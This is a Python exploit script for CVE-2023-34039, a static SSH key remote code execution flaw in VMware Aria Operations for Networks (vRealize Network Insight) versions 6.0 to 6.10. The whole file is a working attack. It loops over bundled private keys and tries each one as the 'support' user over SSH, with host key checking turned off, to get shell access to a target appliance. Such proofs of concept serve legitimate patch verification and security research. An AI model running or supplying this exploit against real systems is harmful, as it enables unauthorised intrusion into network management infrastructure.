"""
VMWare Aria Operations for Networks (vRealize Network Insight) Static SSH key RCE (CVE-2023-34039)
Version: All versions from 6.0 to 6.10
Discovered by: Harsh Jaiswal (@rootxharsh) and Rahul Maini (@iamnoooob) at ProjectDiscovery Research
Exploit By: Sina Kheirkhah (@SinSinology) of Summoning Team (@SummoningTeam)
A root cause analysis of the vulnerability can be found on my blog:
https://summoning.team/blog/vmware-vrealize-network-insight-ssh-key-rce-cve-2023-34039/
"""
import argparse
import os
import subprocess

parser = argparse.ArgumentParser()
parser.add_argument('--target', '-t', help='Target IP address (192.168.1.1)', required=True)
parser.add_argument('--port', '-p', help='Target SSH Port', default='22', required=False)
args = parser.parse_args()

print("""(!) VMWare Aria Operations for Networks (vRealize Network Insight) Static SSH key RCE (CVE-2023-34039)

(*) Exploit by Sina Kheirkhah (@SinSinology) of Summoning Team (@SummoningTeam)
""")

def exploit():
    for root, dirs, files in os.walk("keys"):
        for file in files:
            key_file = str(os.path.join(root, file))
            print(f"(*) Trying key: {key_file}\n")
            ssh_command = ['ssh', '-i', key_file, 'support@' + args.target, '-p', args.port, '-o', 'StrictHostKeyChecking=no', '-o', 'UserKnownHostsFile=/dev/null', '-o', 'BatchMode=yes', '2>/dev/null']
            try:
                ssh_command = ' '.join(ssh_command)
                coutput = os.system(ssh_command)
            except Exception as e:
                log = f"(-) Failed connecting to {args.target}:{args.port} with key {key_file}!"
                continue
exploit()